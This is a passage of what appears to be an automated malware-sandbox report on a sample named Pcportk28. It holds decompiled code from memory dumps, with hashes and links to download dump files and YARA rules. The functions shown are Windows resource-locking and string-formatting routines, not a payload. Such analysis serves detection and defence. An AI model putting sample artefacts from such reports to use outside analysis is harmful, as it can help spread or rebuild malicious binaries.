                                                0x00890c4a
                                                0x00890c4e
                                                0x00890c51
                                                0x00890c54
                                                0x00890c57
                                                0x00890c5a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00890c60
                                                0x00890afb
                                                0x00890afe
                                                0x00890b02
                                                0x00890b05
                                                0x00890b08
                                                0x00000000
                                                0x00890b08
                                                0x00890ae6
                                                0x00890b44
                                                0x008909f8
                                                0x008909f8
                                                0x008909f9
                                                0x00000000
                                                0x00000000
                                                0x008beaa0
                                                0x00000000

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: __fassign
                                                • String ID: .$:$:
                                                • API String ID: 3965848254-2308638275
                                                • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                • Instruction ID: 688084f030b8fd5028a8d110dc5ec42e1accb143fba33af9b211687bf4da103e
                                                • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                • Instruction Fuzzy Hash: FBA1AC71D0431ADFCF24EF68C8446AEB7B5FF05319F28856AE852E7242D6309A41CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00890554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 50%
                                                			E00890554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009301c0;
									_push(_t144);
									_push(0);
									_t51 = E0084F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = L00894FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									L008A3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									L008A3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E008D217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									L008A3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00893915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009301c0;
												_push(_t138);
												_push(0);
												_t58 = E0084F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = L00894FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												L008A3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												L008A3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E008D217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												L008A3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00893915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00875384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0084F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00893915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0084F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00893915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0084F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00893915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00875329(_t110, _t138);
																_t69 = E008753A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                0x0089055a
                                                0x0089055d
                                                0x00890563
                                                0x00890566
                                                0x008905d8
                                                0x008905e2
                                                0x008905e5
                                                0x00000000
                                                0x008905e7
                                                0x008905e7
                                                0x008905ea
                                                0x008905f3
                                                0x008905f3
                                                0x00890568
                                                0x00890568
                                                0x00890568
                                                0x00890569
                                                0x00890569
                                                0x00890569
                                                0x0089056b
                                                0x00000000
                                                0x00000000
                                                0x008b217f
                                                0x008b2183
                                                0x008b225b
                                                0x008b225f
                                                0x008b2189
                                                0x008b218c
                                                0x008b218f
                                                0x008b2194
                                                0x008b2199
                                                0x008b219d
                                                0x008b21a0
                                                0x008b21a2
                                                0x008b21ce
                                                0x008b21ce
                                                0x008b21ce
                                                0x008b21d0
                                                0x008b21d6
                                                0x008b21de
                                                0x008b21e2
                                                0x008b21e8
                                                0x008b21e9
                                                0x008b21ec
                                                0x008b21f1
                                                0x008b21f6
                                                0x00000000
                                                0x00000000
                                                0x008b21f8
                                                0x008b21fb
                                                0x008b2206
                                                0x008b220b
                                                0x008b220c
                                                0x008b2217
                                                0x008b2226
                                                0x008b222b
                                                0x008b222c
                                                0x008b222f
                                                0x008b2232
                                                0x008b2235
                                                0x008b2235
                                                0x008b223a
                                                0x008b223f
                                                0x008b2241
                                                0x008b2243
                                                0x008b2248
                                                0x008b2248
                                                0x008b224d
                                                0x008b224f
                                                0x008b2262
                                                0x008b2263
                                                0x008b2268
                                                0x008b2269
                                                0x008b2269
                                                0x008b2269
                                                0x008b226d
                                                0x00000000
                                                0x00000000
                                                0x008b2276
                                                0x008b2279
                                                0x008b227e
                                                0x008b2283
                                                0x008b2287
                                                0x008b228a
                                                0x008b228d
                                                0x008b228f
                                                0x008b22bc
                                                0x008b22bc
                                                0x008b22bc
                                                0x008b22be
                                                0x008b22c4
                                                0x008b22cc
                                                0x008b22d0
                                                0x008b22d6
                                                0x008b22d7
                                                0x008b22da
                                                0x008b22df
                                                0x008b22e4
                                                0x00000000
                                                0x00000000
                                                0x008b22e6
                                                0x008b22e9
                                                0x008b22f4
                                                0x008b22f9
                                                0x008b22fa
                                                0x008b2305
                                                0x008b2314
                                                0x008b2319
                                                0x008b231a
                                                0x008b231d
                                                0x008b2320
                                                0x008b2323
                                                0x008b2323
                                                0x008b2328
                                                0x008b232d
                                                0x008b232f
                                                0x008b2331
                                                0x008b2336
                                                0x008b2336
                                                0x008b233b
                                                0x008b233d
                                                0x008b2350
                                                0x008b2351
                                                0x008b2356
                                                0x008b2359
                                                0x008b2359
                                                0x008b235b
                                                0x008b235d
                                                0x00875367
                                                0x0087536b
                                                0x00875372
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x008b2363
                                                0x008b2363
                                                0x008b2369
                                                0x008b236a
                                                0x008b236c
                                                0x008b2371
                                                0x008b2373
                                                0x00000000
                                                0x008b2379
                                                0x008b2379
                                                0x008b237a
                                                0x008b237f
                                                0x008b237f
                                                0x008b2385
                                                0x008b2386
                                                0x008b2389
                                                0x008b238e
                                                0x008b2390
                                                0x00875378
                                                0x0087537c
                                                0x008b2396
                                                0x008b2396
                                                0x008b2397
                                                0x008b239c
                                                0x008b23a2
                                                0x008b23a3
                                                0x008b23a6
                                                0x008b23ab
                                                0x008b23ad
                                                0x00000000
                                                0x008b23b3
                                                0x008b23b3
                                                0x008b23b4
                                                0x008b23b9
                                                0x008b23ba
                                                0x008b23ba
                                                0x008b23bc
                                                0x008b23bf
                                                0x00000000
                                                0x00000000
                                                0x008a9153
                                                0x008a9158
                                                0x008a915a
                                                0x008a915e
                                                0x008a9160
                                                0x00000000
                                                0x008a9166
                                                0x008a9166
                                                0x008a9171
                                                0x008a9176
                                                0x008a9176
                                                0x00000000
                                                0x008a9160
                                                0x008b23c6
                                                0x008b23ce
                                                0x008b23d7
                                                0x008b23d7
                                                0x008b23ad
                                                0x008b2390
                                                0x008b2373
                                                0x008b233f
                                                0x008b233f
                                                0x00000000
                                                0x008b233f
                                                0x008b2291
                                                0x008b2291
                                                0x008b2293
                                                0x008b2295
                                                0x008b229a
                                                0x008b22a1
                                                0x008b22a3
                                                0x008b22a7
                                                0x008b22a9
                                                0x00000000
                                                0x00000000
                                                0x008b22ab
                                                0x008b22ad
                                                0x008b22af
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x008b22af
                                                0x008b22b1
                                                0x008b22b4
                                                0x008b22b4
                                                0x008b22b6
                                                0x008753be
                                                0x008753be
                                                0x008753be
                                                0x008753c0
                                                0x00000000
                                                0x00000000
                                                0x008753cb
                                                0x008753ce
                                                0x008753d0
                                                0x008753d4
                                                0x008753d6
                                                0x00000000
                                                0x008753d8
                                                0x008753e3
                                                0x008753ea
                                                0x008753ea
                                                0x00000000
                                                0x008753d6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x008b22b6
                                                0x00000000
                                                0x008b228f
                                                0x008b2349
                                                0x008b234d
                                                0x008b2251
                                                0x008b2251
                                                0x00000000
                                                0x008b2251
                                                0x008b21a4
                                                0x008b21a4
                                                0x008b21a6
                                                0x008b21a8
                                                0x008b21ac
                                                0x008b21b6
                                                0x008b21b8
                                                0x008b21bc
                                                0x008b21be
                                                0x00000000
                                                0x00000000
                                                0x008b21c0
                                                0x008b21c2
                                                0x008b21c4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x008b21c4
                                                0x008b21c6
                                                0x008b21c6
                                                0x008b21c8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x008b21c8
                                                0x008b21a2
                                                0x00000000
                                                0x008b2183
                                                0x0089057b
                                                0x0089057d
                                                0x00890581
                                                0x00890583
                                                0x008b2178
                                                0x00000000
                                                0x00890589
                                                0x0089058f
                                                0x0089058f
                                                0x00890583
                                                0x00000000

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008B2206
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-4236105082
                                                • Opcode ID: 1308bcba8b59a0c57a5eed0ecb0ba5254ed24d2ff474b98c80bf5c1c2d412c11
                                                • Instruction ID: 5944a5b67be2a4145b1090f46fc2d6b3860a3798719e05829e128bc2a6f24749
                                                • Opcode Fuzzy Hash: 1308bcba8b59a0c57a5eed0ecb0ba5254ed24d2ff474b98c80bf5c1c2d412c11
                                                • Instruction Fuzzy Hash: 8C514831B006016FEB15DA1CCC82FA673A9FB98725F258229FD14DF386D935EC418B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008914C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 64%
                                                			E008914C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x932088; // 0x75d90fb1
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00887707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E008913CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00887707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00887707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00852340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0085E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                0x008914c0
                                                0x008914cb
                                                0x008914d2
                                                0x008914d6
                                                0x008914da
                                                0x008914de
                                                0x008914e3
                                                0x0089157a
                                                0x0089157a
                                                0x008914f1
                                                0x008914f3
                                                0x008bea0f
                                                0x00000000
                                                0x008bea15
                                                0x00000000
                                                0x008bea15
                                                0x008914f9
                                                0x008914f9
                                                0x008914fe
                                                0x00891504
                                                0x008bea1a
                                                0x008bea1f
                                                0x008bea21
                                                0x008bea22
                                                0x008bea27
                                                0x008bea2a
                                                0x008bea2a
                                                0x00891515
                                                0x00891517
                                                0x0089156d
                                                0x00891572
                                                0x00891575
                                                0x00891575
                                                0x0089151e
                                                0x008bea50
                                                0x008bea55
                                                0x008bea58
                                                0x008bea58
                                                0x0089152e
                                                0x00891531
                                                0x00891533
                                                0x00000000
                                                0x00891535
                                                0x00891541
                                                0x00891549
                                                0x00891549
                                                0x00891533
                                                0x008914f3
                                                0x00891559

                                                APIs
                                                • ___swprintf_l.LIBCMT ref: 008BEA22
                                                  • Part of subcall function 008913CB: ___swprintf_l.LIBCMT ref: 0089146B
                                                  • Part of subcall function 008913CB: ___swprintf_l.LIBCMT ref: 00891490
                                                • ___swprintf_l.LIBCMT ref: 0089156D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: e7aef026dbae33c5159153064f9347acc0dc2d7770d8ca5c2ee3ecf90ccc28ab
                                                • Instruction ID: b79a6af8e24e4bf480ebaa2a3791af8f24b893255340c737e756f032ec17b5ac
                                                • Opcode Fuzzy Hash: e7aef026dbae33c5159153064f9347acc0dc2d7770d8ca5c2ee3ecf90ccc28ab
                                                • Instruction Fuzzy Hash: 43219C7290422A9BCF20BE58CC49AEA73BCFB60705F5A4051FC46D3240DB74AA588BE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008753A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 45%
                                                			E008753A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x009301c0;
									_push(_t92);
									_push(0);
									_t37 = E0084F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = L00894FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									L008A3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									L008A3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E008D217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									L008A3F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00893915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00875384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0084F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00893915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0084F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00893915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0084F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00893915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E00875329(_t74, _t92);
													_push(1);
													_t48 = E008753A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                0x008753ab
                                                0x008753ae
                                                0x008753b1
                                                0x008753b4
                                                0x008753b7
                                                0x008905b6
                                                0x008905c0
                                                0x008905c3
                                                0x00000000
                                                0x008905c9
                                                0x008905c9
                                                0x008905cc
                                                0x008905d5
                                                0x008905d5
                                                0x008753bd
                                                0x008753bd
                                                0x008753bd
                                                0x008753be
                                                0x008753be
                                                0x008753be
                                                0x008753c0
                                                0x00000000
                                                0x00000000
                                                0x008b2269
                                                0x008b226d
                                                0x008b2349
                                                0x008b234d
                                                0x008b2273
                                                0x008b2276
                                                0x008b2279
                                                0x008b227e
                                                0x008b2283
                                                0x008b2287
                                                0x008b228a
                                                0x008b228d
                                                0x008b228f
                                                0x008b22bc
                                                0x008b22bc
                                                0x008b22bc
                                                0x008b22be
                                                0x008b22c4
                                                0x008b22cc
                                                0x008b22d0
                                                0x008b22d6
                                                0x008b22d7
                                                0x008b22da
                                                0x008b22df
                                                0x008b22e4
                                                0x00000000
                                                0x00000000
                                                0x008b22e6
                                                0x008b22e9
                                                0x008b22f4
                                                0x008b22f9
                                                0x008b22fa
                                                0x008b2305
                                                0x008b2314
                                                0x008b2319
                                                0x008b231a
                                                0x008b231d
                                                0x008b2320
                                                0x008b2323
                                                0x008b2323
                                                0x008b2328
                                                0x008b232d
                                                0x008b232f
                                                0x008b2331
                                                0x008b2336
                                                0x008b2336
                                                0x008b233b
                                                0x008b233d
                                                0x008b2350
                                                0x008b2351
                                                0x008b2356
                                                0x008b2359
                                                0x008b2359
                                                0x008b235b
                                                0x008b235d
                                                0x00875367
                                                0x0087536b
